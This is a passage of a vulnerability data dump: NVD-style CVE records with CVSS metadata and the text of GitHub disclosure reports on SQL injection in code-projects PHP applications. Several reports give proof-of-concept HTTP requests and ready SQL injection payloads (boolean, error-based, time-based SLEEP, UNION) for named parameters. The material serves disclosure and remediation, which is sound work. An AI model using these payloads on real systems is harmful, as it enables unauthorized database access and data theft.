vasubidate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
code-projects Online Quiz Site Using PHP With Source Code v1.0 showtest.php SQL injection
https://api.github.com/repos/ZTurNA/cve/issues/1/comments
0
2024-09-18T08:03:26Z
2024-09-18T08:03:26Z
https://github.com/ZTurNA/cve/issues/1
2,533,017,975
1
6,285
CVE-2024-9011
2024-09-20T01:15:10.550
A vulnerability, which was classified as critical, was found in code-projects Crud Operation System 1.0. Affected is an unknown function of the file updata.php. The manipulation of the argument sid leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Product" ], "url": "https://code-projects.org/" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ppp-src/a/issues/14" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.278166" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.278166" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.410396" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:code-projects:crud_operation_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "D15BB350-68BE-4E74-B9CE-BC9120B6F230", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/ppp-src/a/issues/14
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ppp-src", "a" ]
# code-projects.org"Crud Operation System" in PHP 1.0 "updata.php" SQL injection # NAME OF AFFECTED PRODUCT(S) + Pharmacy/Medical Store Point of Sale System Using PHP/MySQL and Bootstrap Framework with Source Code ## Vendor Homepage + https://code-projects.org/crud-operation-system-in-php-with-source-code/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + xxxx ## Vulnerable File + updata.php ## VERSION(S) + V1.0 ## Software Link + https://download.code-projects.org/details/731e738a-548f-4e50-adb7-0ac0a36236d3 # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'updata.php ' file of the 'Crud Operation System' project. The reason for this issue is that attackers inject malicious code from the parameter "sid" and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + During the security review of the PHP "Crud Operation System", "xxx" discovered a critical SQL injection vulnerability in the "updata.php " file. This vulnerability stems from insufficient user input validation of the "sid" parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity. # No login or authorization is required to exploit this vulnerability # Vulnerability details and POC --- POST /update.php HTTP/1.1 Host: 192.168.1.116:125 Content-Length: 20 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.1.116:125 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://192.168.1.116:125/update.php Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=91n8tlusg53s0gag34n66htunh Connection: keep-alive sid=111&showbtn=Show --- ## Vulnerability type: + time-based blind + boolean-based blind + error-based + UNION query ## Vulnerability location: + 'sid' parameter ## Payload: --- Parameter: sid (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: sid=111 AND 4886=4886&showbtn=Show Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: sid=111 OR (SELECT 8698 FROM(SELECT COUNT(*),CONCAT(0x71766b7171,(SELECT (ELT(8698=8698,1))),0x716b7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&showbtn=Show Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: sid=111 AND (SELECT 7057 FROM (SELECT(SLEEP(5)))CcqS)&showbtn=Show Type: UNION query Title: Generic UNION query (NULL) - 5 columns Payload: sid=111 UNION ALL SELECT NULL,CONCAT(0x71766b7171,0x734e41556d5654554176446c4477575065416c47426f6e55547050456b596f78674f6741534c5379,0x716b7a7171),NULL,NULL,NULL-- -&showbtn=Show --- + ![1](https://github.com/user-attachments/assets/ae80094f-3667-45b2-93d6-e4da7be5117d) ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: + ![2](https://github.com/user-attachments/assets/73816250-32e8-4397-b1cb-c74f733ecb35) + ![3](https://github.com/user-attachments/assets/8ac9bd1e-82d2-4abb-90c4-c4b839cc8172) + ![4](https://github.com/user-attachments/assets/a4319cab-de67-41d1-9ad7-7ea2cd62ee26) # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
code-projects.org"Crud Operation System" in PHP 1.0 "updata.php" SQL injection
https://api.github.com/repos/ppp-src/a/issues/14/comments
0
2024-09-18T09:39:42Z
2024-09-18T09:39:42Z
https://github.com/ppp-src/a/issues/14
2,533,224,679
14
6,286
CVE-2024-9078
2024-09-22T04:15:04.203
A vulnerability has been found in code-projects Student Record System 1.0 and classified as critical. This vulnerability affects unknown code of the file /course.php. The manipulation of the argument coursename leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 6.9, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Product" ], "url": "https://code-projects.org/" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ppp-src/a/issues/15" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.278248" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.278248" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.411542" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:code-projects:student_record_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "E81D3A4D-EB3A-4716-B5AA-71424DC86572", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/ppp-src/a/issues/15
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ppp-src", "a" ]
# code-projects.org"Student Record System" in PHP 1.0 "course.php" SQL injection # NAME OF AFFECTED PRODUCT(S) + Student Record System In PHP With Source Code ## Vendor Homepage + https://code-projects.org/student-record-system-in-php-with-source-code/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + xxxx ## Vulnerable File + course.php ## VERSION(S) + V1.0 ## Software Link + https://download.code-projects.org/details/e7b42365-c27d-4fdb-b4e9-498917d5ba75 # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'course.php ' file of the 'Student Record System' project. The reason for this issue is that attackers inject malicious code from the parameter "coursename" and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + During the security review of the PHP "Student Record System", "xxx" discovered a critical SQL injection vulnerability in the "course.php " file. This vulnerability stems from insufficient user input validation of the "coursename" parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity. # No login or authorization is required to exploit this vulnerability # Vulnerability details and POC --- POST /course.php HTTP/1.1 Host: 192.168.1.116:131 Content-Length: 82 Cache-Control: max-age=0 Origin: http://192.168.1.116:131 Content-Type: application/x-www-form-urlencoded Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://192.168.1.116:131/course.php Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=u4kenn3o0umcqhg4d9ifp64jip Connection: keep-alive coursecode=ENGLISH+001&coursename=1&sessionname=2019-2020&semestername=1st&submit= --- ## Vulnerability type: + time-based blind ## Vulnerability location: + 'coursename' parameter ## Payload: --- Parameter: coursename (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: coursecode=ENGLISH 001&coursename=1' AND (SELECT 3435 FROM (SELECT(SLEEP(5)))SXqZ) AND 'bPdE'='bPdE&sessionname=2019-2020&semestername=1st&submit= --- + ![1](https://github.com/user-attachments/assets/c951177b-2682-488b-82ea-6e37b3cf4c40) ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: + ![2](https://github.com/user-attachments/assets/8e65a4eb-93f7-4298-ad4b-0c5f5fbcc7ab) + ![3](https://github.com/user-attachments/assets/304186de-0b00-4376-8c4d-d96b5d2e1d5d) + ![4](https://github.com/user-attachments/assets/a0fdc14d-48e8-4401-858e-a3b920029a28) # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
# code-projects.org"Student Record System" in PHP 1.0 "course.php" SQL injection
https://api.github.com/repos/ppp-src/a/issues/15/comments
0
2024-09-20T07:19:59Z
2024-09-20T07:19:59Z
https://github.com/ppp-src/a/issues/15
2,538,075,549
15
6,287
CVE-2024-9079
2024-09-22T05:15:11.710
A vulnerability was found in code-projects Student Record System 1.0 and classified as critical. This issue affects some unknown processing of the file /marks.php. The manipulation of the argument coursename leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 6.9, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Product" ], "url": "https://code-projects.org/" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ppp-src/a/issues/16" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.278249" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.278249" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.411846" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:code-projects:student_record_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "E81D3A4D-EB3A-4716-B5AA-71424DC86572", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/ppp-src/a/issues/16
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ppp-src", "a" ]
# code-projects.org"Student Record System" in PHP 1.0 "marks.php" SQL injection # NAME OF AFFECTED PRODUCT(S) + Student Record System In PHP With Source Code ## Vendor Homepage + https://code-projects.org/student-record-system-in-php-with-source-code/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + xxxx ## Vulnerable File + marks.php ## VERSION(S) + V1.0 ## Software Link + https://download.code-projects.org/details/e7b42365-c27d-4fdb-b4e9-498917d5ba75 # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'marks.php' file of the 'Student Record System' project. The reason for this issue is that attackers inject malicious code from the parameter "coursename" and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + During the security review of the PHP "Student Record System", "xxx" discovered a critical SQL injection vulnerability in the "marks.php" file. This vulnerability stems from insufficient user input validation of the "coursename" parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity. # No login or authorization is required to exploit this vulnerability # Vulnerability details and POC --- POST /marks.php HTTP/1.1 Host: 192.168.1.116:131 Content-Length: 55 Cache-Control: max-age=0 Origin: http://192.168.1.116:131 Content-Type: application/x-www-form-urlencoded Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://192.168.1.116:131/marks.php Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=u4kenn3o0umcqhg4d9ifp64jip Connection: keep-alive coursecode=ENGLISH+001&coursename=1&seatlimit=1&submit= --- ## Vulnerability type: + time-based blind ## Vulnerability location: + 'coursename' parameter ## Payload: --- Parameter: coursename (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: coursecode=ENGLISH 001&coursename=1' AND (SELECT 2118 FROM (SELECT(SLEEP(5)))lcSo) AND 'ebjJ'='ebjJ&seatlimit=1&submit= --- + ![1](https://github.com/user-attachments/assets/3e15d7d1-395d-40d1-be36-709e7a93fe6a) ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: + ![2](https://github.com/user-attachments/assets/1bc27fc9-8a98-4b1d-9984-916b6456eae1) + ![3](https://github.com/user-attachments/assets/952a8b38-8dfe-459e-8fd5-be7f85c56898) + ![4](https://github.com/user-attachments/assets/6fb7af71-c6cf-4d76-8cec-b2b708ee8b35) # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
# code-projects.org"Student Record System" in PHP 1.0 "marks.php" SQL injection
https://api.github.com/repos/ppp-src/a/issues/16/comments
0
2024-09-21T04:08:40Z
2024-09-21T04:08:40Z
https://github.com/ppp-src/a/issues/16
2,539,958,391
16
6,288
CVE-2024-9080
2024-09-22T07:15:10.607
A vulnerability was found in code-projects Student Record System 1.0. It has been classified as critical. Affected is an unknown function of the file /pincode-verification.php. The manipulation of the argument pincode leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 6.9, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", 